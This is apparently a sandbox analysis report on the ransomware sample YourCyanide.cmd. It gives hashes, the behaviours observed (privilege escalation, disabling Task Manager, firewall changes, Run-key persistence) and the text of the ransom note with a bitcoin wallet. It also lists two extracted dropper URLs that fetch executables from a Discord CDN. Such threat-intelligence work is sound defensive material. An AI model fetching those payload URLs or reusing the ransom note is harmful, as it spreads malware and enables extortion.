Overview

overview

10

Static

static

YourCyanide.cmd

windows7_x64

10

YourCyanide.cmd

windows10-2004_x64

10

Resubmissions

22/07/2024, 10:50

240722-mxrjasvajk 10

19/05/2022, 17:19

220519-vv97maaad7 10

19/05/2022, 17:15

220519-vskh7acghq 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    YourCyanide.cmd

  • Size

    153KB

  • Sample

    220519-vskh7acghq

  • MD5

    69eb09a987e1bfe31418cd020811b81d

  • SHA1

    d7dd4d7f065f078cf55a7c0c1f4bcd9ec52096d6

  • SHA256

    4b3efbf87fb31216a93954617e149825b9f029b4a37ea0fff9851eb363693424

  • SHA512

    8ff7aafd71231704edd19f5aef32ebf181918d3e02afb909e82271c11ec2d16da3bebc8eeb0246821bcda07f8c499a7c0e4fb438f723b448945d27d3b714815b

Score
10/10
evasionpersistenceransomware

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Extracted

Path

C:\Users\Admin\Desktop\YcynNote.txt

Ransom Note
Q: What happened to my files? A: Oops your files have been encrypted by YourCyanide. Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if I dont pay? A: You will never get your files back. A: contact at [email protected]. ++++++++++++++++++++++++++++++++++++++++++++ 7510 Files have been encrypted

Targets

    • Target

      YourCyanide.cmd

    • Size

      153KB

    • MD5

      69eb09a987e1bfe31418cd020811b81d

    • SHA1

      d7dd4d7f065f078cf55a7c0c1f4bcd9ec52096d6

    • SHA256

      4b3efbf87fb31216a93954617e149825b9f029b4a37ea0fff9851eb363693424

    • SHA512

      8ff7aafd71231704edd19f5aef32ebf181918d3e02afb909e82271c11ec2d16da3bebc8eeb0246821bcda07f8c499a7c0e4fb438f723b448945d27d3b714815b

    Score
    10/10
    evasionpersistenceransomware

    • Grants admin privileges

      Uses net.exe to modify the user's privileges.

    • Blocklisted process makes network request

    • Disables Task Manager via registry modification

      evasion

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Modifies Windows Firewall

      evasion

    • Adds Run key to start application

      persistence

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1behavioral2

MITRE ATT&CK Enterprise v6

Tasks